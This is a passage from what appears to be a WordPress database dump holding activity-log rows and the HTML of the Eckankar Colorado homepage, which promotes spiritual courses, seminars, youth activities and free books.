ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269403\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269404\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"aligncenter size-full wp-image-269405\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242988,41195,'_message_key','post_updated'),(242989,41195,'_user_id','2'),(242990,41195,'_user_login','S8zhaBda'),(242991,41195,'_user_email','nada@zipnadanot.org'),(242992,41195,'_server_remote_addr','76.130.120.x'),(242993,41195,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(242994,41196,'post_id','7160'),(242995,41196,'post_type','page'),(242996,41196,'post_title','Home'),(242997,41196,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 